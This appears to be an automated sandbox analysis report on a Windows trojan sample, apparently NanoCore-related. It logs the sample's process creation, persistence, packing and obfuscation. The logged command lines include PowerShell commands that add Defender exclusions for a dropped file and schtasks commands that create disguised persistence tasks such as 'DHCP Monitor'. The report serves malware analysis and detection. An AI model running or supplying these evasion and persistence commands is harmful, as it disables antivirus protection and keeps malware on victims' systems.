        Source: U7Ncg7oAyC.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile read: C:\Users\user\Desktop\U7Ncg7oAyC.exeJump to behavior
        Source: U7Ncg7oAyC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe "C:\Users\user\Desktop\U7Ncg7oAyC.exe"
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DAD.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp7772.tmp
        Source: unknownProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe 0
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpE07C.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpFF8.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DAD.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp7772.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpE07C.tmp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpFF8.tmp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile created: C:\Users\user\AppData\Roaming\LYKZypsugb.exeJump to behavior
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile created: C:\Users\user\AppData\Local\Temp\tmp43AF.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@42/24@4/2
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{b3a6f9ad-fdc4-4025-8d68-cc0f37771046}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1328:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: U7Ncg7oAyC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: U7Ncg7oAyC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 0.2.U7Ncg7oAyC.exe.b80000.0.unpack
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 19.2.U7Ncg7oAyC.exe.420000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.cf0000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 24.2.dhcpmon.exe.3b0000.0.unpack
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 0.2.U7Ncg7oAyC.exe.b80000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 19.2.U7Ncg7oAyC.exe.420000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.cf0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 24.2.dhcpmon.exe.3b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_00B82299 push ebx; ret
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D761E8 push esp; iretd
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D76AE1 push dword ptr [ebx]; iretd
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_054D3DFB push esi; ret
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_09C93DBD pushfd ; ret
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 6_2_00522299 push ebx; ret
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_00422299 push ebx; ret
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D561E8 push esp; iretd
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D56AE1 push dword ptr [ebx]; iretd
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_09293DBD pushfd ; ret
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00CF2299 push ebx; ret
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A61E8 push esp; iretd
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A6AE1 push dword ptr [ebx]; iretd
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05713DFB push esi; ret
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_09B43DBD pushfd ; ret
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_003B2299 push ebx; ret
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_026661E8 push esp; iretd
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02666AE1 push dword ptr [ebx]; iretd
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04F33DFB push esi; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.75508986641
        Source: initial sampleStatic PE information: section name: .text entropy: 7.75508986641
        Source: initial sampleStatic PE information: section name: .text entropy: 7.75508986641
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
